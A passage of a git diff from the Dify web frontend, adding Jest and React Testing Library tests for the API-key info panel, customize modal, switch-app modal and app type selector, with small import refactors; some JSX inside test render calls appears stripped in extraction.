interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.tsx b/web/app/components/app/overview/apikey-info-panel/index.tsx index b50b0077cb..47fe7af972 100644 --- a/web/app/components/app/overview/apikey-info-panel/index.tsx +++ b/web/app/components/app/overview/apikey-info-panel/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' import { LinkExternal02 } from '@/app/components/base/icons/src/vender/line/general' import { IS_CE_EDITION } from '@/config' diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/overview/embedded/index.tsx b/web/app/components/app/overview/embedded/index.tsx index 6eba993e1d..d4be58b1b2 100644 --- a/web/app/components/app/overview/embedded/index.tsx +++ b/web/app/components/app/overview/embedded/index.tsx @@ -14,7 +14,7 @@ import type { SiteInfo } from '@/models/share' import { useThemeContext } from '@/app/components/base/chat/embedded-chatbot/theme/theme-context' import ActionButton from '@/app/components/base/action-button' import { basePath } from '@/utils/var' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { siteInfo?: SiteInfo diff --git a/web/app/components/app/overview/settings/index.tsx b/web/app/components/app/overview/settings/index.tsx index 3b71b8f75c..d079631cf7 100644 --- a/web/app/components/app/overview/settings/index.tsx +++ b/web/app/components/app/overview/settings/index.tsx @@ -25,7 +25,7 @@ import { useModalContext } from '@/context/modal-context' import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' import type { AppIconSelection } from '@/app/components/base/app-icon-picker' import AppIconPicker from '@/app/components/base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDocLink } from '@/context/i18n' export type ISettingsModalProps = { diff --git a/web/app/components/app/switch-app-modal/index.spec.tsx b/web/app/components/app/switch-app-modal/index.spec.tsx new file mode 100644 index 0000000000..b6fe838666 --- /dev/null +++ b/web/app/components/app/switch-app-modal/index.spec.tsx @@ -0,0 +1,295 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import SwitchAppModal from './index' +import { ToastContext } from '@/app/components/base/toast' +import type { App } from '@/types/app' +import { AppModeEnum } from '@/types/app' +import { Plan } from '@/app/components/billing/type' +import { NEED_REFRESH_APP_LIST_KEY } from '@/config' + +const mockPush = jest.fn() +const mockReplace = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + }), +})) + +const mockSetAppDetail = jest.fn() +jest.mock('@/app/components/app/store', () => ({ + useStore: (selector: (state: any) => unknown) => selector({ setAppDetail: mockSetAppDetail }), +})) + +const mockSwitchApp = jest.fn() +const mockDeleteApp = jest.fn() +jest.mock('@/service/apps', () => ({ + switchApp: (...args: unknown[]) => mockSwitchApp(...args), + deleteApp: (...args: unknown[]) => mockDeleteApp(...args), +})) + +let mockIsEditor = true +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: mockIsEditor, + userProfile: { + email: 'user@example.com', + }, + langGeniusVersionInfo: { + current_version: '1.0.0', + }, + }), +})) + +let mockEnableBilling = false +let mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, +} +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: mockPlan, + enableBilling: mockEnableBilling, + }), +})) + +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) =>
    AppsFull {loc}
    , +})) + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'app-123', + name: 'Demo App', + description: 'Demo description', + author_name: 'Demo author', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: AppModeEnum.COMPLETION, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const renderComponent = (overrides: Partial> = {}) => { + const notify = jest.fn() + const onClose = jest.fn() + const onSuccess = jest.fn() + const appDetail = createMockApp() + + const utils = render( + + + , + ) + + return { + ...utils, + notify, + onClose, + onSuccess, + appDetail, + } +} + +describe('SwitchAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockIsEditor = true + mockEnableBilling = false + mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + } + }) + + // Rendering behavior for modal visibility and default values. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.switch')).toBeInTheDocument() + expect(screen.getByDisplayValue('Demo App(copy)')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.switch')).not.toBeInTheDocument() + }) + }) + + // Prop-driven UI states such as disabling actions. + describe('Props', () => { + it('should disable the start button when name is empty', async () => { + const user = userEvent.setup() + // Arrange + renderComponent() + + // Act + const nameInput = screen.getByDisplayValue('Demo App(copy)') + await user.clear(nameInput) + + // Assert + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + + it('should render the apps full warning when plan limits are reached', () => { + // Arrange + mockEnableBilling = true + mockPlan = { + ...mockPlan, + usage: { ...mockPlan.usage, buildApps: 10 }, + total: { ...mockPlan.total, buildApps: 10 }, + } + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + }) + + // User interactions that trigger navigation and API calls. + describe('Interactions', () => { + it('should call onClose when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onClose } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'app.newApp.Cancel' })) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should switch app and navigate with push when keeping original', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail, notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-001' }) + const setItemSpy = jest.spyOn(Storage.prototype, 'setItem') + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockSwitchApp).toHaveBeenCalledWith({ + appID: appDetail.id, + name: 'Demo App(copy)', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + }) + expect(onSuccess).toHaveBeenCalledTimes(1) + expect(onClose).toHaveBeenCalledTimes(1) + expect(notify).toHaveBeenCalledWith({ type: 'success', message: 'app.newApp.appCreated' }) + expect(setItemSpy).toHaveBeenCalledWith(NEED_REFRESH_APP_LIST_KEY, '1') + expect(mockPush).toHaveBeenCalledWith('/app/new-app-001/workflow') + expect(mockReplace).not.toHaveBeenCalled() + }) + + it('should delete the original app and use replace when remove original is confirmed', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail } = renderComponent({ inAppDetail: true }) + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-002' }) + + // Act + await user.click(screen.getByText('app.removeOriginal')) + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockDeleteApp).toHaveBeenCalledWith(appDetail.id) + }) + expect(mockReplace).toHaveBeenCalledWith('/app/new-app-002/workflow') + expect(mockPush).not.toHaveBeenCalled() + expect(mockSetAppDetail).toHaveBeenCalledTimes(1) + }) + + it('should notify error when switch app fails', async () => { + const user = userEvent.setup() + // Arrange + const { notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockRejectedValueOnce(new Error('fail')) + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(notify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + expect(onClose).not.toHaveBeenCalled() + expect(onSuccess).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/switch-app-modal/index.tsx b/web/app/components/app/switch-app-modal/index.tsx index a7e1cea429..742212a44d 100644 --- a/web/app/components/app/switch-app-modal/index.tsx +++ b/web/app/components/app/switch-app-modal/index.tsx @@ -6,7 +6,7 @@ import { useContext } from 'use-context-selector' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/text-generate/item/index.tsx b/web/app/components/app/text-generate/item/index.tsx index 4d0a17d790..1e61ff18c7 100644 --- a/web/app/components/app/text-generate/item/index.tsx +++ b/web/app/components/app/text-generate/item/index.tsx @@ -14,7 +14,7 @@ import { useStore as useAppStore } from '@/app/components/app/store' import type { WorkflowProcess } from '@/app/components/base/chat/types' import type { SiteInfo } from '@/models/share' import { useChatContext } from '@/app/components/base/chat/chat/context' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import ContentSection from './content-section' import MetaSection from './meta-section' import { useMoreLikeThisState, useWorkflowTabs } from './hooks' diff --git a/web/app/components/app/text-generate/saved-items/index.tsx b/web/app/components/app/text-generate/saved-items/index.tsx index c22a4ca6c2..e6cf264cf2 100644 --- a/web/app/components/app/text-generate/saved-items/index.tsx +++ b/web/app/components/app/text-generate/saved-items/index.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import copy from 'copy-to-clipboard' import NoData from './no-data' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { SavedMessage } from '@/models/debug' import { Markdown } from '@/app/components/base/markdown' import Toast from '@/app/components/base/toast' diff --git a/web/app/components/app/type-selector/index.spec.tsx b/web/app/components/app/type-selector/index.spec.tsx new file mode 100644 index 0000000000..346c9d5716 --- /dev/null +++ b/web/app/components/app/type-selector/index.spec.tsx @@ -0,0 +1,144 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import AppTypeSelector, { AppTypeIcon, AppTypeLabel } from './index' +import { AppModeEnum } from '@/types/app' + +jest.mock('react-i18next') + +describe('AppTypeSelector', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers default rendering and the closed dropdown state. + describe('Rendering', () => { + it('should render "all types" trigger when no types selected', () => { + render() + + expect(screen.getByText('app.typeSelector.all')).toBeInTheDocument() + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) + + // Covers prop-driven trigger variants (empty, single, multiple). + describe('Props', () => { + it('should render selected type label and clear button when a single type is selected', () => { + render() + + expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + + it('should render icon-only trigger when multiple types are selected', () => { + render() + + expect(screen.queryByText('app.typeSelector.all')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.chatbot')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.workflow')).not.toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + }) + + // Covers opening/closing the dropdown and selection updates. + describe('User interactions', () => { + it('should toggle option list when clicking the trigger', () => { + render() + + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.getByRole('tooltip')).toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + + it('should call onChange with added type when selecting an unselected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.WORKFLOW]) + }) + + it('should call onChange with removed type when selecting an already-selected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.workflow')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([]) + }) + + it('should call onChange with appended type when selecting an additional item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.chatbot')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.agent')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.CHAT, AppModeEnum.AGENT_CHAT]) + }) + + it('should clear selection without opening the dropdown when clicking clear button', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.clear' })) + + expect(onChange).toHaveBeenCalledWith([]) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) +}) + +describe('AppTypeLabel', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers label mapping for each supported app type. + it.each([ + [AppModeEnum.CHAT, 